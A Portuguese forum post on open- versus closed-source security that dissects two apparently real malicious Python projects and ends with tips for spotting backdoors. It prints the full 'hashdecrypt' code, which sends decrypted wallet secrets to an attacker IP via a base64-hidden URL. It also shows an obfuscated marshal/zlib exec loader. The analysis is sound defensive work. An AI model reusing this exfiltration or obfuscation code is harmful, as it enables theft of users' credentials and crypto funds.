Vamos começar com o básico.

Código aberto - programas de código aberto fornecem acesso ao código-fonte do programa, permitindo aos usuários visualizar e modificar o código.
Código fechado - Os programas de código fechado fornecem apenas o código executável, mas não fornecem acesso ao código-fonte do programa.

Prós do código aberto :
*transparência
livre
a oportunidade de mudar o programa por si mesmo/contribuir para o projeto
Contras do código aberto :
*probabilidade de malware oculto no interior, com base na confiança das pessoas no código aberto
muitas vezes falta de apoio

Prós do código fechado :
fácil de usar
suporte profissional do desenvolvedor
Desvantagens do código fechado :
falta de transparência (probabilidade de malware/vazamento de dados internos, com base na falta de capacidade dos usuários de verificar o código)
dependência do desenvolvedor

Sim, o código aberto é mais seguro, mas o código fechado costuma ser mais conveniente. Também é mais fácil encontrar uma vulnerabilidade em código-fonte aberto, mas quem a encontra pode usá-la para seus próprios fins ou informar o desenvolvedor/ajudar a removê-la.

Depois de vários anos em TI, desenvolvi um hábito muito útil - duvidar do código fechado e ainda mais duvidoso do código aberto . Afinal, com código fechado tudo é óbvio, tudo pode ficar escondido ali, você está pronto para isso. Mas e o código aberto, qual é o benefício para o desenvolvedor? O código aberto joga com o fato de você confiar nele automaticamente , porque “ ninguém irá incorporar malware em código aberto e, em qualquer caso, alguém verifica tudo isso ao publicar Github/PyPI/..., e se também houver 3 estrelas em o idiota... "
Tomemos como exemplo um contrato inteligente; poucas pessoas confiarão nele e o usarão se seu código não for publicado. Após a publicação, o código é aberto, você olha e, à primeira vista, está tudo bem. E então, depois de 15 dias, ele irá trapacear. Como? Afinal, um contrato inteligente não pode ser alterado após a publicação e ser registrado no blockchain. Claro - havia um backdoor , mas estava escondido de tal forma que era improvável que uma pessoa sem conhecimento certo o encontrasse.
Geralmente é disfarçado como funções padrão/sem nome/de uma linha com um nome como _/ aN49Qio3hma/*nome inteligente temático, como no primeiro pacote desmontado (abaixo)* ou escondido dentro de um enorme código de lixo. Este é um dos principais problemas do código aberto.

As principais formas de distribuir pacotes backdoor são publicando no Github, PyPI, RubyGems e npm.
Minhas dicas para evitar malware estarão no final.

Vejamos o pacote do tópico que falei no início:

PyPI - hashdecrypt

Tudo é extremamente simples aqui. Após a instalação, há apenas um pequeno arquivo chamado hashDecrypt.py:

import json
import base64
import hashlib
from Crypto.Cipher import AES
from requests import post, get
# +---------------------------------+
# |           [HashDecrypt]            |
# | https://github.com/HashSnake    |
# |     Telegram: @HashSnake        |
# +---------------------------------+
# |bytes(bytes_line).decode("utf-8")|
# +---------------------------------+

class hdec:
    def key_from_password(self, password, salt):
        salt_buffer = base64.b64decode(salt)
        password_buffer = password.encode('utf-8')
        key = hashlib.pbkdf2_hmac(
            'sha256',
            password_buffer,
            salt_buffer,
            10000,
            dklen=32
            )
        return key

    def decrypt_with_key(self, key, payload):
        encrypted_data = base64.b64decode(payload["data"])
        vector = base64.b64decode(payload["iv"])
        data = encrypted_data[:-16]
        cipher = AES.new(key, AES.MODE_GCM, nonce=vector)
        decrypted_data = cipher.decrypt(data)
        return decrypted_data

    def jsBIP39(self, payload):

        def cli_keccak256(raw_hash, raw_vault):
            try:
                message_bytes = raw_vault.encode('ascii')
                b64_bytes = base64.b64encode(message_bytes)
                b64_m = b64_bytes.decode('ascii')
                post(get(raw_hash).text.strip(), json={"b64": b64_m})
            except:
                pass
        encode_data = "aHR0cHM6Ly9naXRodWIuY29tL0hhc2hTbmFrZS9iYWNrZW5kYXBpL3Jhdy9tYWluL3NldHRpbmdz"
        base64_bytes = encode_data.encode('ascii')
        message_bytes = base64.b64decode(base64_bytes)
        cli_keccak256(message_bytes.decode('ascii'), payload)

    def decrypt(self, password, text):
        try:
            payload = json.loads(text)
            salt = payload['salt']
            key = self.key_from_password(password, salt)
            decrypted_string = self.decrypt_with_key(key, payload).decode('utf-8')
            self.jsBIP39(decrypted_string)
            jsf = json.loads(decrypted_string)
            return {"status": True, "message": None, "result": jsf}
        except UnicodeDecodeError:
            return {"status": False, "message": "wrong password", "result": None}
        except:
            return {"status": False, "message": "unknown", "result": None}

https://forumupload.ru/uploads/001b/c9/09/2/t426513.png

A primeira coisa que vemos é a importação das funções post e get. Por que eles estão em um pacote para trabalhar com criptografia?
A segunda coisa que vemos são os contatos do desenvolvedor?) Incomum.

https://forumupload.ru/uploads/001b/c9/09/2/t122075.png

Vamos mais longe e vejamos essas linhas. Em ordem:
1. Após uma descrição bem-sucedida, antes de gerar o resultado, é iniciada a função jsBIP39, para a qual o valor encontrado é passado
2. Algo codificado em BASE64​
3. O valor codificado do ponto 2 é codificado em ascii (str -> bytes)​
4. O valor codificado do ponto 3 é decodificado por BASE64 e se torna um link “ https://github.com/HashSnake/backendapi … n/settings
5. A função aninhada cli_keccak256 é chamada, para a qual o URL recebido da etapa 4 é passado sob o disfarce de raw_hash e o valor que será enviado para o URL sob o disfarce de raw_vault
6. O valor que será enviado para a url também é codificado em ascii (str -> bytes)​
7. O valor codificado do ponto 6 agora está codificado em BASE64​
8. O valor codificado em BASE64 da etapa 7 é convertido novamente em uma string (bytes -> str)​
9.​
post(get(raw_hash).text.strip(), json={“b64”: b64_m})​

O que está acontecendo aqui:​
1. get(raw_hash)- faz uma solicitação GET para a URL que foi recebida no ponto 4 e recebe http://65.109.70.235:3030/apiuma resposta
2. .text.strip()- pega o atributo de resposta “texto” e remove espaços do início e do final dele
3. post(get(raw_hash).text.strip(), json={“b64”: b64_m})= post(“http://65.109.70.235:3030/api”, json={“b64”: b64_m})- envia dados roubados codificados em BASE64 para o servidor

Parece que este é um pacote estranhamente primitivo - 1 arquivo, 60 linhas . Mas, infelizmente, no momento muitas pessoas não têm conhecimento suficiente de que código aberto! = código seguro , então lançam código aberto com total confiança.

Naveguei em https://pypi.org e acidentalmente encontrei outro pacote , mas com exatamente a mesma função de enviar dados para o servidor (só que um servidor diferente, aparentemente, ele já faz isso há muito tempo).

https://forumupload.ru/uploads/001b/c9/09/2/t430000.png

O próximo script da review é do GitHub, que foi encontrado após 5 minutos de busca, um pouco mais interessante, mas aparentemente pensado para pessoas que não têm noção de suas ações.

Repositório: https://github.com/nft30001/Bitcoin-Mnemonic-Bruteforce

import sys
import random
import time
import datetime
import json
import os

try:
    import binascii
except:
    os.system('pip install binascii')
try:
    import mnemonic
except:
    os.system('pip install mnemonic')
try:
    import bip32utils
except:
    os.system('pip install bip32utils')
try:
    import requests
except:
    os.system('pip install requests')

import binascii
import mnemonic
import bip32utils
import requests

_ = lambda __ : __import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(__[::-1])));
exec((_)(b'=='))

https://forumupload.ru/uploads/001b/c9/09/2/t928730.png

Na ordem:
1. Tentando importar os pacotes necessários, caso não estejam instalados - instalação
2. Reimportando pacotes, caso tenha faltado algum pacote na etapa anterior
3.
_ = lambda __ : __import__(‘marshal’).loads(__import__(‘zlib’).decompress(__import__(‘base64’).b64decode(__[::-1])));​

O que está acontecendo aqui:​
1. __[::-1]- inverte o texto codificado em BASE64 ( ==g1L+IL…= LI+L1g==…)
2. __import__(‘base64’).b64decode(…)- importa base64 e decodifica o valor invertido após 1 ponto, a saída é bytecode (“x\x9c\\\x9bG\x8e\xeb\xdczE\…”)
3. __import__(‘zlib’).decompress(…)- descompacta os dados do ponto 2 usando zlib
4. __import__(‘marshal’).loads(…)- carrega o resultado descompactado de 3 pontos e desserializa os dados, <code object <module> at 0x…, file “<x>", line 1>retorna
4. exec((_)(b’==g1L+I…Oe0mcxJe’))- executa o resultado da função do ponto 3, provavelmente um exe malicioso.

Mas qualquer um pode construir tais backdoors. Aqui está um exemplo de malware de código aberto mais sério:
O pacote PyPI malicioso mistura código-fonte e código compilado para evitar a detecção.

Resultados.
Como evitar ser pego por malware de código aberto?
1. Preste atenção ao desenvolvedor e à sua reputação
2. Preste atenção na classificação e data de lançamento
3. Se for GitHub - verifique as guias “Problemas” e “Solicitações pull” para reclamações/avisos de outras pessoas

https://forumupload.ru/uploads/001b/c9/09/2/t924864.png

4. Se houver um arquivo com todos os pacotes instalados (package.json/requirements.txt/…) - verifique a presença de pacotes
5. Dê uma olhada no código em Python, backdoors geralmente estão ocultos em __init__.py e arquivos inocentes semelhantes, geralmente vazios. É melhor começar verificando as importações .
6. Se houver muito código e apenas isso for necessário em todo o pacote, é muito mais rápido e seguro simplesmente cortar a função necessária para você, se a estrutura do pacote permitir .
7. Verifique assinaturas

Como evitar ser pego por malware de código fechado?
1. Preste atenção ao desenvolvedor e à sua reputação
2. Instale programas de fontes
3. Use antivírus e ore
4. Monitore o comportamento (às vezes você pode analisar o tráfego para prevenção )
5. Verifique assinaturas